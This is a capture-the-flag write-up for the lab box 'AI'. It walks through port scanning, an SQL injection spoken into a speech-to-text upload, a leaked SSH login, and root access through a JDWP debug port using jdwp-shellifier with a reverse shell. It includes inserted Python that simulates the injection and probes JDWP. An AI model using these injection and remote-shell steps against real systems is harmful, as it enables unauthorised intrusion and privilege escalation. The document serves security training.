Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-21 12:01 IST
Nmap scan report for 10.10.10.163
Host is up (0.32s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 6d:16:f4:32:eb:46:ca:37:04:d2:a5:aa:74:ed:ab:fc (RSA)
| 256 78:29:78:d9:f5:43:d1:cf:a0:03:55:b1:da:9e:51:b6 (ECDSA)
|_ 256 85:2e:7d:66:30:a6:6e:30:04:82:c1:ae:ba:a4:99:bd (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Hello AI!
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 47.12 seconds
I ran gobuster against port 80:
/.php (Status: 403) [Size: 277]
/images (Status: 301) [Size: 313] [--> http://10.10.10.163/images/]
/index.php (Status: 200) [Size: 37347]
/contact.php (Status: 200) [Size: 37371]
/about.php (Status: 200) [Size: 37503]
/uploads (Status: 301) [Size: 314] [--> http://10.10.10.163/uploads/]
/db.php (Status: 200) [Size: 0]
/intelligence.php (Status: 200) [Size: 38674]
/ai.php (Status: 200) [Size: 37569]
/.php (Status: 403) [Size: 277]
/server-status (Status: 403) [Size: 277]
Intelligence.php
On ai.php we can upload files.
Uploading PHP or other file types gives no error, but nothing happens either.
From intelligence.php we can guess that it expects a WAV file and does some kind of speech-to-text on it.
I'll create a WAV file with flite, a text-to-speech tool:
sudo apt install flite
flite -w hello.wav -voice rms -t "hello"
I'll upload hello.wav and look at the result.
I get "hello" back.
The query result is empty. The word "query", together with a comment on the page that looks like a SQL statement, suggests the transcribed text goes into a database query, so I'll try a single quote:
flite -w hello.wav -voice rms -t "open single quote"
And I get a SQL error. Now I'll try to get some creds.
I could have used information_schema to find the table name, but I guessed it right (users) and got a username:
flite -w hello.wav -voice rms -t "open single quote space union select space username space from users comment database"
Now for the password:
alexa:H,Sq9t6}a<)?q93_
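To make the injection chain concrete, here is an added example (not code from the writeup or from the box) that simulates the speech-to-text front end and the database lookup behind it, then runs the same three phrases used above: a plain word, a lone single quote, and the UNION payload. The spoken-token mapping ("open single quote", "space", "comment database"), the application's own lookup query and the responses table are assumptions; the users table and username column come from the page, and the stored password is a constructed placeholder, not the real one. The hardened parameterised lookup is included beside the vulnerable one so the difference is visible on the same input.

```python
import sqlite3

# Assumed spoken-token mapping of the speech-to-text front end. The writeup uses
# these phrases; the page does not reproduce the real mapping table.
SPOKEN = {"open single quote": "'", "comment database": "-- -", "space": " "}


def transcribe(phrase: str) -> str:
    """Turn a spoken phrase into the text the application would query with."""
    words = phrase.lower().split()
    out, i = [], 0
    while i < len(words):
        for n in (3, 2, 1):  # longest known token first
            chunk = " ".join(words[i:i + n])
            if i + n <= len(words) and chunk in SPOKEN:
                out.append(SPOKEN[chunk])
                i += n
                break
        else:
            out.append(words[i])
            i += 1
    return " ".join(" ".join(out).split())  # collapse runs of whitespace


def make_db() -> sqlite3.Connection:
    """Constructed stand-in for the box's MySQL database. Only the users table
    and its username column are from the writeup; the rest is assumed."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE responses (phrase TEXT, answer TEXT)")
    con.execute("INSERT INTO responses VALUES ('what is your name', 'I am AI')")
    con.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    con.execute("INSERT INTO users VALUES (1, 'alexa', 'placeholder-not-the-real-password')")
    return con


def vulnerable_lookup(con: sqlite3.Connection, text: str) -> list:
    # Presumed bug: the transcribed text is spliced into the SQL by string formatting.
    sql = f"SELECT answer FROM responses WHERE phrase = '{text}'"
    return [row[0] for row in con.execute(sql)]


def safe_lookup(con: sqlite3.Connection, text: str) -> list:
    # Hardened form: a bound parameter, so the quote and UNION are only data.
    return [row[0] for row in
            con.execute("SELECT answer FROM responses WHERE phrase = ?", (text,))]


def probe(con: sqlite3.Connection, spoken: str, lookup=vulnerable_lookup):
    """Mirror the manual loop above: speak a phrase, see the rows or the SQL error."""
    try:
        return lookup(con, transcribe(spoken))
    except sqlite3.Error as e:
        return f"SQL error: {e}"


if __name__ == "__main__":
    db = make_db()
    payload = ("open single quote space union select space username "
               "space from users comment database")
    print(transcribe(payload))                 # the SQL the app actually receives
    print(probe(db, "hello"))                  # empty result, as on the page
    print(probe(db, "open single quote"))      # SQL error
    print(probe(db, payload))                  # ['alexa']
    print(probe(db, payload, safe_lookup))     # [] with the parameterised query
```

The interesting part is the transcript itself: "space" is only there to guarantee whitespace around the keywords, and "comment database" closes the injected query so the trailing quote the application appends is ignored. Run against the real box the same phrase works because MySQL treats `-- ` as a comment just as SQLite does here.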
I SSH in with the creds.
Got it
jdwp is highlighted in yellow in the enumeration output; this could be the way to root.
It's listening on port 8000:
alexa@AI:/tmp$ netstat -tunlp | grep 127
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
tcp 0 0 127.0.0.1:8000 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp6 0 0 127.0.0.1:8009 :::* LISTEN -
tcp6 0 0 127.0.0.1:8080 :::* LISTEN -
udp 0 0 127.0.0.53:53 0.0.0.0:*
I'll forward ports 8000, 8009 and 8080 to my machine:
ssh alexa@ai.htb -L 8009:localhost:8009 -L 8080:localhost:8080 -L 8000:localhost:8000
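Before pointing an exploit at the forwarded port it is worth confirming that 127.0.0.1:8000 really speaks JDWP and which JVM is behind it. The following is an added example, not code from the writeup or from jdwp-shellifier: a small JDWP client that performs the 14-byte "JDWP-Handshake" exchange and then sends the VirtualMachine.Version command (command set 1, command 1), parsing the reply. So that it runs offline it also includes a constructed fake JDWP service and a fake non-JDWP service on loopback; the version strings those return are made up, and the box's real JVM version is not on the page.

```python
import socket
import struct
import threading

HANDSHAKE = b"JDWP-Handshake"


def build_command(pkt_id: int, cmd_set: int, cmd: int, data: bytes = b"") -> bytes:
    # JDWP command packet: length(4) id(4) flags(1) cmdset(1) cmd(1), big-endian.
    return struct.pack(">IIBBB", 11 + len(data), pkt_id, 0, cmd_set, cmd) + data


def read_exact(sock: socket.socket, n: int) -> bytes:
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("connection closed early")
        buf += chunk
    return buf


def jstr(s: str) -> bytes:
    # JDWP string: 4-byte length followed by UTF-8 bytes.
    b = s.encode()
    return struct.pack(">I", len(b)) + b


def read_jstr(data: bytes, off: int):
    (n,) = struct.unpack_from(">I", data, off)
    return data[off + 4:off + 4 + n].decode(), off + 4 + n


def jdwp_probe(host: str, port: int, timeout: float = 3.0):
    """Return (True, info) if the service completes the handshake and answers
    VirtualMachine.Version, otherwise (False, reason)."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(HANDSHAKE)
        reply = read_exact(s, len(HANDSHAKE))
        if reply != HANDSHAKE:
            return False, f"not JDWP, got {reply!r}"
        s.sendall(build_command(1, 1, 1))  # VirtualMachine (1) / Version (1)
        # Reply packet: length(4) id(4) flags(1, 0x80 = reply) errorCode(2).
        length, _pkt_id, flags, err = struct.unpack(">IIBH", read_exact(s, 11))
        if flags != 0x80 or err != 0:
            return False, f"unexpected reply flags=0x{flags:02x} err={err}"
        body = read_exact(s, length - 11)
        desc, off = read_jstr(body, 0)
        major, minor = struct.unpack_from(">II", body, off)
        vm_version, off = read_jstr(body, off + 8)
        vm_name, _ = read_jstr(body, off)
        return True, {"description": desc, "jdwp": f"{major}.{minor}",
                      "vm_version": vm_version, "vm_name": vm_name}


def fake_jdwp_server(ready: dict) -> None:
    """Constructed stand-in for a JVM debug port (values are made up)."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    ready["port"] = srv.getsockname()[1]
    ready["event"].set()
    conn, _ = srv.accept()
    with srv, conn:
        if read_exact(conn, 14) != HANDSHAKE:
            return
        conn.sendall(HANDSHAKE)
        _, pkt_id, _, cmd_set, cmd = struct.unpack(">IIBBB", read_exact(conn, 11))
        if (cmd_set, cmd) != (1, 1):
            return
        body = (jstr("Java Debug Wire Protocol (Reference Implementation)")
                + struct.pack(">II", 1, 8) + jstr("1.8.0_222")
                + jstr("OpenJDK 64-Bit Server VM"))
        conn.sendall(struct.pack(">IIBH", 11 + len(body), pkt_id, 0x80, 0) + body)


def fake_http_server(ready: dict) -> None:
    """Constructed non-JDWP service, to show the negative case."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    ready["port"] = srv.getsockname()[1]
    ready["event"].set()
    conn, _ = srv.accept()
    with srv, conn:
        conn.recv(64)
        conn.sendall(b"HTTP/1.0 400 Bad Request\r\n\r\n")


def probe_fake(kind: str = "jdwp"):
    """Start one of the fake services on a random loopback port and probe it."""
    ready = {"event": threading.Event()}
    target = fake_jdwp_server if kind == "jdwp" else fake_http_server
    threading.Thread(target=target, args=(ready,), daemon=True).start()
    ready["event"].wait(2)
    return jdwp_probe("127.0.0.1", ready["port"])


if __name__ == "__main__":
    print(probe_fake("jdwp"))
    print(probe_fake("http"))
    # Against the box, after the ssh -L above: print(jdwp_probe("127.0.0.1", 8000))
```

The check is deliberately read-only: Version is one of the few JDWP commands with no side effects on the debuggee, so it confirms the protocol and the VM without touching any thread or breakpoint, which matters when the debug port belongs to a service you would rather not crash before you have root.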
I googled JDWP and privilege escalation and found some posts,
which linked [jdwp-shellifier](https://github.com/hugsy/jdwp-shellifier).
I'll use this to execute a command.
I created a reverse shell script (/tmp/hello.sh) on the target and started a netcat listener on port 9001:
python3 jdwp-shellifier.py -t 127.0.0.1 --break-on 'java.lang.String.indexOf' --cmd 'bash /tmp/hello.sh'
Got a shell
Root